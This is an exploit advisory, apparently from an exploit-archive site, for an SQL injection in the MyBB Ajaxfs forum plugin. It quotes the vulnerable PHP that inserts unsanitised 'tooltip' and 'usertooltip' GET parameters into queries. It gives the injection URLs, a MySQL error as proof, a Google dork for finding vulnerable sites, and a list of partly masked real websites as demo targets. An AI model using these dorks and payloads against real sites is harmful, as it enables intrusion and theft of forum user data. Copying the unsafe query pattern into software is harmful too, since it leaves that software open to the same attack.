########################################################
#
Exploit Title : Mybb Ajaxfs
Plugin Sql Injection vulnerability
# Author : Iranian Exploit DataBase
# Discovered By : IeDb
# Software Link : http://mods.mybb.com/download/ajax-forum-stat-v-2
# Security Risk : High
# Tested on : Linux
# Dork : inurl:ajaxfs.php
# Author : Iranian Exploit DataBase
# Discovered By : IeDb
# Software Link : http://mods.mybb.com/download/ajax-forum-stat-v-2
# Security Risk : High
# Tested on : Linux
# Dork : inurl:ajaxfs.php
########################################################
1)
if(isset($_GET['tooltip']))
{
$pid=$_GET['tooltip'];
$query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");
2)
if(isset($_GET['usertooltip']))
{
$uid=$_GET['usertooltip'];
$query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");
http://localhost/Upload/ajaxfs.php?usertooltip=1'
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
right syntax to use near ''''' at line 1
Google DORK : inurl:ajaxfs.php
# Exploit :
# http://site.com/mybb/ajaxfs.php?tooltip=[sql]
# http://site.com/mybb/ajaxfs.php?usertooltip=[sql]
# Dem0 : # http://www.forumX.birahy.com/ajaxfs.php?tooltip=mostreffer'
# http://www.tamXishe.ir/ajaxfs.php?tooltip=mostreffer'
# http://www.XXopencartvn.com/forum/ajaxfs.php?tooltip=mostreffer'
# http://freeXnimbuzz.takbb.com/_mybb_/ajaxfs.php?tooltip='
# http://dvlXottery.us/ajaxfs.php?tooltip=13349'
# http://www.taltallXon.com/forum/ajaxfs.php?tooltip=mostreffer'
#################################
# Tnx To : All Member In Iedb.ir/acc & Iranian Hackers
#################################
# Exploit Archive = http://www.iedb.ir/exploits-889.html
#################################
